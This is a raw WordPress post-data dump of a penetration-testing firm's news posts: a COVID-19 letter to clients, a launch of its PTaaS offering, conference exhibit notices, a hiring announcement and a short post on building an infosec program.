The health and safety of our employees is our primary concern. We are following CDC, state, and local guidelines for our staff and office closures. As a global organization, we have always supported a strong virtual infrastructure for team collaboration.
At this time, most of our client interaction is taking place over email, phone, and video conference. We continue to focus on exceeding expectations, maintaining connectivity, and ensuring continued contact with all clients to answer questions and manage your testing needs.
NetSPI is a strong, healthy business and team. Our clients can be confident leveraging our testing expertise which will continue without interruption. You are the backbone of our business and we thank you for your continued partnership and confidence.
If you have specific questions about a project, please reach out to your sales or PMO contact. If you would like to speak directly to someone on our Executive Team, please feel free to contact me directly.
We appreciate your business and look forward to continuing to serve you.
Aaron ShiltsPresident & COOAaron.Shilts@NetSPI.com
C: 612-326-4018
[post_title] => NetSPI Response to COVID-19
[post_excerpt] => On March 17, 2020, we shared the below communication with our customers in regards to COVID-19, and wanted to make it available to the broader community.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-response-to-covid-19
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:53:04
[post_modified_gmt] => 2021-04-14 06:53:04
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=17790
[menu_order] => 405
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[79] => WP_Post Object
(
[ID] => 16655
[post_author] => 91
[post_date] => 2020-02-17 07:00:15
[post_date_gmt] => 2020-02-17 07:00:15
[post_content] =>
PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
Minneapolis, Minnesota – NetSPI, the leader in enterprise security testing and vulnerability management, today debuted its new delivery model, Penetration Testing as a Service (PTaaS) powered by the Resolve™ platform. PTaaS puts customers in control of their pentests and their data, enabling them to simplify the scoping of new engagements, view their testing results in real time, orchestrate quicker remediation, and adding the ability to perform always-on continuous testing.
Taking note of customer needs and emerging attack surfaces, NetSPI has leveraged its knowledge in traditional, point-in-time pentests to develop a scalable, always-on model for enterprise security testing. NetSPI PTaaS delivers program level security testing comprised of an expert manual pentesting team enhanced by automation.
“During our 20 years of penetration testing, our clients have consistently asked for guidance to understand, report on, and remediate their security vulnerabilities. While we’ve been excited to provide this assistance, we also knew there was more we could do to meet all our clients’ needs, which led to the creation of PTaaS,” said NetSPI President and Chief Operating Officer, Aaron Shilts. “As a leader in the cybersecurity industry, our experts have always found vulnerabilities that others miss, but PTaaS allows us to go a step further – delivering clear, actionable recommendations to our customers, enabling them to find and fix their vulnerabilities faster.”
According to Gartner, “although separate from VA, penetration testing plays an important role in the prioritization and assessment of vulnerabilities from Gartner’s RBVM (risk-based vulnerability management) methodology. These services are testing your environment, with real-world skills and knowledge of the prevailing threat landscape. Security leaders need to take these recommendations and apply it directly in your security programs to address their prioritized findings.”*
NetSPI believes PTaaS powered by Resolve™ solves critical cybersecurity challenges, by enabling:
Real-time accessible reporting: Gone are the days of managing multiple static PDF reports with out-of-date vulnerability information. With PTaaS powered by Resolve™, organizations can access their data in real-time as vulnerabilities are found by the NetSPI team of experts, and easily generate custom reports as desired.
Increased speed to remediation: PTaaS powered by Resolve™ helps organizations fix their vulnerabilities faster than traditional pentesting. Resolve™, a SaaS platform, will house all vulnerability data and provide remediation guidance for real-time access and assessment. In addition, customers can communicate with NetSPI security experts via the platform for additional clarity, to request remediation testing, or to scope a new engagement.
Continued manual testing: NetSPI’s team of highly skilled employees will continue its award-winning service of deep-dive manual penetration testing as automated pentesting and scanners will only ever find a portion of an organization’s vulnerabilities. While automation creates efficiencies, the human touch is also necessary to identify potentially high and critical severity threats that can only be discovered by manual testing.
More testing: Organizations with a mature security program understand that point-in-time testing is not a viable model to continuously secure their applications and networks. New code and configurations are released every day, and PTaaS powered by the Resolve™ platform’s continuous security program delivers results to customers around the clock, enabling them to manage their vulnerabilities easier and more efficiently.
Learn more about NetSPI PTaaS powered by Resolve™ at here or set up a 1:1 meeting at RSAC on February 24-28 online here.
*Gartner “Market Guide for Vulnerability Assessment,” Craig Lawson, et al, 20 November 2019
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Introduces Penetration Testing as a Service (PTaaS) Powered by Resolve™
[post_excerpt] => PTaaS will be demoed at RSAC 2020, showcasing how the delivery model enables organizations to keep pace with today’s cybersecurity landscape.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-introduces-penetration-testing-as-a-service-ptaas-powered-by-resolve
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 06:54:00
[post_modified_gmt] => 2021-04-14 06:54:00
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16655
[menu_order] => 413
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[80] => WP_Post Object
(
[ID] => 16308
[post_author] => 91
[post_date] => 2020-02-04 07:00:34
[post_date_gmt] => 2020-02-04 07:00:34
[post_content] =>
NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
Minneapolis, Minnesota – NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco. On February 24-28, the halls will be filled cybersecurity industry conversations, including expert-led sessions and keynotes, innovation programs, in-depth tutorials and trainings, expanded networking opportunities, product demos, and more. This year, the conference theme is “Human Element,” exploring our critical role in ensuring a safer, more secure future. During the conference, the NetSPI leadership team will be showcasing its new Penetration Testing as a Service (PTaaS) delivery service model powered by Resolve™.
Who:
Deke George, Founder and CEO at NetSPI
Aaron Shilts, President and COO at NetSPI
Charles Horton, SVP Client Services at NetSPI
Jake Reynolds, Product Manager at NetSPI
What:
RSAC Exhibitor Booth – Meet the NetSPI team at booth #4201 to learn more about their expertise in penetration testing and vulnerability management. Get a first look and demo of PTaaS Powered by Resolve™.
“Scaling Your Security Program with Penetration Testing as a Service” – Whether managing an annual penetration test, or delivering and prioritizing millions of vulnerabilities, traditional service delivery methods fall short. Visit booth S-1500 in the RSAC Briefing Center on Thursday, February 28 at 4:40pm PST to hear NetSPI Product Manager Jake Reynolds speak about how Penetration Testing as a Service scales and operationalizes continuous penetration testing in an ongoing, consumable fashion.
View the full conference agenda here.
When:
February 24-29, 2020
Where:
Booth #4201
Moscone Center
San Francisco, California
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top ten U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee on behalf of NetSPI
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Heads to RSAC 2020 to Showcase and Demo Penetration Testing as a Service (PTaaS) Powered by Resolve™
[post_excerpt] => NetSPI, a leader in vulnerability testing and management, is exhibiting at RSAC 2020 at the Moscone Center in San Francisco.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-heads-to-rsac-2020-to-showcase-and-demo-pen-testing-as-a-service-ptaas-powered-by-resolve
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 07:13:25
[post_modified_gmt] => 2021-04-14 07:13:25
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16308
[menu_order] => 416
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[81] => WP_Post Object
(
[ID] => 16211
[post_author] => 91
[post_date] => 2020-01-21 07:00:32
[post_date_gmt] => 2020-01-21 07:00:32
[post_content] =>
Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.
Minneapolis, Minnesota – NetSPI, a leader in enterprise security testing and vulnerability management, has added Nabil Hannan as Managing Director, where he will work with NetSPI clients on strategic security solutions incorporating both technology and services.
“NetSPI’s innovative technology and services are essential for any high performing security program,” said Aaron Shilts, NetSPI President and COO. “Strategically, we continue to strive to be at the leading edge of this industry, providing valuable, actionable guidance to our clients, and Nabil adds to our ability to do this. He will consult directly with our clients and advise them on how to solve their most critical cyber security challenges in 2020 and beyond.”
Hannan comes to NetSPI with a deep background in building and improving effective software security initiatives, with expertise in the financial services sector. Most notably, in his 13 years of experience in cyber security consulting, he held a position at Cigital/Synopsys Software Integrity Group, where he identified, scoped, and delivered on software security projects, including architectural risk analysis, penetration testing, secure code review, malicious code detection, vulnerability remediation, and mobile security assessments. Hannan has also worked as a Product Manager at Research In Motion/BlackBerry and has managed several flagship initiatives and projects through the full software development life cycle.
“Cyber security is more critical today than ever before. We’ve all seen news of breaches in the headlines and may have even been affected by these breaches personally,” said Nabil Hannan, NetSPI Managing Director. “I look forward to advising NetSPI’s prestigious client base and helping companies protect their organizations, strategic assets, and valuable intellectual property. My role will also support NetSPI’s vision to help organizations build and maintain strong threat and vulnerability management programs – leveraging both technology and human capital.”
Learn more about NetSPI’s Advisory Services at https://netspi.com/services/strategic-advisory/ or connect with Nabil on Twitter or LinkedIn.
About NetSPI
NetSPI is the leader in enterprise security testing and vulnerability management. We are proud to partner with seven of the top 10 U.S. banks, the largest global cloud providers, and many of the Fortune® 500. Our experts perform deep dive manual penetration testing of application, network, and cloud attack surfaces. We uniquely deliver Penetration Testing as a Service (PTaaS) through our Resolve™ platform. Clients love PTaaS for the simplicity of scoping new engagements, viewing their testing results in real-time, orchestrating remediation, and the ability to perform always-on continuous testing. We find vulnerabilities that others miss and deliver clear, actionable recommendations allowing our customers to find, track and fix their vulnerabilities faster. Follow us on Facebook, Twitter, and LinkedIn.
Media Contact
Tori Norris
Maccabee Public Relations
Email: tori@maccabee.com
Phone: (612) 294-3100
[post_title] => NetSPI Adds Seasoned Security Expert Nabil Hannan to Its Team
[post_excerpt] => Hannan brings 13 years’ cyber security experience to help NetSPI clients overcome vulnerability management challenges.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-adds-seasoned-security-expert-nabil-hannan-to-its-team
[to_ping] =>
[pinged] =>
[post_modified] => 2021-04-14 07:11:03
[post_modified_gmt] => 2021-04-14 07:11:03
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?post_type=news&p=16211
[menu_order] => 418
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[82] => WP_Post Object
(
[ID] => 15848
[post_author] => 91
[post_date] => 2020-01-14 07:00:02
[post_date_gmt] => 2020-01-14 07:00:02
[post_content] =>
Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs. No matter what stage you’re in with developing your program, keep these three best practices in mind today to set your team and company up for success tomorrow.
Scalability First
Build scalability into every strategy and program.Ask yourself “Will this scale?” at every step. It’s very easy to paint yourself into a corner focusing on a tactical solution when a security alert or emergency occurs, so take a minute to stop and think if your solution is going to scale if it is implemented company wide. If your “solution” is not scalable, you may end up with two- or three-times the work and expense later, so try to quantify the lifetime impact of your decision upfront.
Another scalability-related tip is to plan to be successful from the outset. Choose scalable tools and processes, supported by flexible staffing, to help manage growth efficiently.
Be Flexible
Find a balance between repeatability and consistency vs. flexibility and agile ingenuity. Some processes need to be rigid and consistent, while some can be more freeform. In the past, we’ve tried to engineer a process to enforce a set of constraints only to learn that it did not really matter or mitigate risk. In the security community we tend to look for ways to make processes repeatable and remove their dynamics,but by doing so, we sometimes lose the intended purpose of the activity. It’s more art than science, but finding a balance between flexibility and rigidity is important.
Plan for Communication and Collaboration
Many problemscan be traced back to miscommunicationand misunderstanding of what is usually a technical topic by people that do not have technical expertise. As such, planning for communication and collaboration in the early stages of building out your program is critical.
Keep in mind that people interpret words differently. Scan, assessment, risk, and vulnerability have different meanings to different people and resulted in some miscommunication issues and differing expectations. Take a step back to clearly define those terms and ensure everyone is on the same page.
[post_title] => Three Things To Remember When Building Your InfoSec Program
[post_excerpt] => Over the past 20 years of working with companies of all sizes and ages, NetSPI has seen some of the best and worst infosec programs.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => three-things-to-remember-when-building-your-infosec-program
[to_ping] =>
[pinged] =>
[post_modified] => 2023-02-13 13:39:28
[post_modified_gmt] => 2023-02-13 19:39:28
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=15848
[menu_order] => 419
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[83] => WP_Post Object
(
[ID] => 13214
[post_author] => 91
[post_date] => 2019-07-31 07:00:03
[post_date_gmt] => 2019-07-31 07:00:03
[post_content] => Minneapolis, Minnesota – NetSPI LLC, the leader in orchestrated vulnerability management and security testing, announced today its participation at Black Hat USA 2019, Aug. 7-8 (booth #105) in Las Vegas, NV. NetSPI will present and exhibit at the conference to showcase vulnerability management and penetration testing solutions that improve an organization’s information security posture. NetSPI’s security experts will provide best practices and insights during their presentations and will also be available to meet 1:1. Schedule a session now.
Presentations at NetSPI Booth #105
Attacking Modern Environments through SQL Server with PowerUpSQL
When: Wednesday, August 7 at10:30 a.m., 1:00 p.m., and 4:30 p.m.; Thursday, August 8 at 11:00 a.m.
Where: NetSPI Booth #105
Presenter: Scott Sutherland